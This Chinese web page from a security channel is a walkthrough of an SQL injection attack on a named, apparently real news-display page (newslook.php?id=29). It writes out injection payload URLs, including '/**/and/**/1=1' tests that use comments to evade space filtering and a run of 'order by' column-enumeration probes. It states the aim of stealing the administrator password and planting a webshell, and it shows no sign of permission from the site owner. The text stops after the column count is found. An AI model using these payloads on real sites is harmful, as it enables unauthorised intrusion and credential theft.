网络安全 频道

安全检测纵横时空文学网

    通过错误信息得知WEB路径为/data/webroot/zh/newslook.php通过路径可以肯定服务器为UNIX

    继续使用and 1=1 1=2来判断是不是真的存在注射漏洞 
    http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=1】/**/and/**/1=1 作用与我们在ASP注射中的 and 1=1的效果是一样的,因为有些站会过滤■空格,/**/是替代空格的。返回正常

    继续http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=2】
    返回错误, 现在可以肯定http://xx.ouou.com/newslook.php?id=29 这个地址存在注射漏洞。

    既然存在漏洞,我们就来通过注射点来查找到管理员的密码从而登陆后台来取得WEBSHELL。 现在来爆一下他的有多少个字段。

    使用/**/order/**/by/**/10 来判断他的字段是不是小于10  
    http://XX.ouou.com/newslook.php?id=29【/**/order/**/by/**/10】  如图3


 

    如图得知我们执行/**/order/**/by/**/10 页面返回错误 说明字段是小于10的 我们继续执行

    http://ouou.com/newslook.php?id=29【/**/order/**/by/**/9】
    http://ouou.com/newslook.php?id=29【/**/order/**/by/**/8】
    http://ouou.com/newslook.php?id=29【/**/order/**/by/**/7】
    http://ouou.com/newslook.php?id=29【/**/order/**/by/**/6】
    http://.ouou.com/newslook.php?id=29【/**/order/**/by/**/5】
    http://ouou.com/newslook.php?id=29【/**/order/**/by/**/4】
    直到执行/**/order/**/by/**/4的时候页面返回正常 如图4

0
相关文章